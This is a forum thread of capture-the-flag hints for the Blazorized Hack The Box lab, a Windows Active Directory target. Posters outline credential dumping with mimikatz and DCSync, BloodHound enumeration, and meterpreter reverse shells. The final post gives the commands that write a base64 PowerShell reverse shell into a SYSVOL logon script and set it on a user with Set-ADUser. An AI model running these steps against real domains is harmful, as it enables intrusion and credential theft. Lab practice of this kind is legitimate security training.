Posts: 10
Threads: 0
Joined: Apr 2024
(Jul 01, 2024, 02:30 PM)wh1t3_r4bb1t Wrote: (Jul 01, 2024, 02:17 PM)mmkz Wrote: (Jul 01, 2024, 01:40 PM)wh1t3_r4bb1t Wrote: (Jul 01, 2024, 01:27 PM)mycatdante Wrote: (Jul 01, 2024, 12:28 PM)wh1t3_r4bb1t Wrote: Hey guys. What I suppose to find with mimikatz? LSASS is not possible, vault is empty.
mimikatz is for the last step after we compromise ssa_6010
Yes, I know. I'm 6010 already. I'm novice with windows pwning.
ssa_6610 => bloodhound => DCSync => mimikatz => admin hash.
Has anyone had the issue when bloodhound import .zip like forever?
Or use SharpHound.ps1 to digest. It's the zip file does not work with the BloodHound version
Posts: 219
Threads: 14
Joined: Apr 2024
guys after jwt it tells me
http://admin.blazorized.htb/_blazor
Connection ID required This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 219
Threads: 14
Joined: Apr 2024
after write spn what can i do This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 3
Threads: 0
Joined: Jun 2024
(Jul 01, 2024, 06:27 PM)osamy7593 Wrote: after write spn what can i do
Read further back in the thread, where you'll find the answer multiple times.
Posts: 219
Threads: 14
Joined: Apr 2024
(Jul 01, 2024, 08:06 PM)AAAABBBBCCCCDDDD Wrote: (Jul 01, 2024, 06:27 PM)osamy7593 Wrote: after write spn what can i do
Read further back in the thread, where you'll find the answer multiple times.
okay i get the shell as rsa but whan i put powershell -e ...... in C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\login.bat .. no rev shell back This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 30
Threads: 3
Joined: Aug 2023
Hi !
I have a shell as ssa_6010, but when i want to use Invoke-Mimikatz, my shell dies out.
Anyone has an idea why or has got this problem ?
Posts: 3
Threads: 0
Joined: Jun 2024
Jul 01, 2024, 09:54 PM
(This post was last modified: Jul 01, 2024, 09:55 PM by AAAABBBBCCCCDDDD.)
(Jul 01, 2024, 09:42 PM)osamy7593 Wrote: (Jul 01, 2024, 08:06 PM)AAAABBBBCCCCDDDD Wrote: (Jul 01, 2024, 06:27 PM)osamy7593 Wrote: after write spn what can i do
Read further back in the thread, where you'll find the answer multiple times.
okay i get the shell as rsa but whan i put powershell -e ...... in C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\login.bat .. no rev shell back
Are you also doing Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
?
And are you trying to catch it with metasploit? I used a meterpreter reverse tcp shell and it didn't take more than a minute for the listener to catch
(Jul 01, 2024, 09:48 PM)DeDeLaPouille Wrote: Hi !
I have a shell as ssa_6010, but when i want to use Invoke-Mimikatz, my shell dies out.
Anyone has an idea why or has got this problem ?
Try another shell would be my guess. Like I said to dude above, try a meterpreter shell
Posts: 219
Threads: 14
Joined: Apr 2024
guys what tells us to use
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
i can't find anything in bloodhound .. can some one tell me This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 9
Threads: 0
Joined: Nov 2023
(Jul 01, 2024, 09:48 PM)DeDeLaPouille Wrote: Hi !
I have a shell as ssa_6010, but when i want to use Invoke-Mimikatz, my shell dies out.
Anyone has an idea why or has got this problem ?
Transfer over to a meterpreter shell. Should work fine there.
Posts: 20
Threads: 0
Joined: May 2024
For anyone wondering, this is how I got a shell as SSA_6010:
*Evil-WinRM* PS C:\programdata> echo "powershell -e JABjAGw...<SNIP>...ACgAKQA=" | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\login.bat -Encoding ASCII
*Evil-WinRM* PS C:\programdata> Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
Powershell #3 (Base64) from https://www.revshells.com/
|
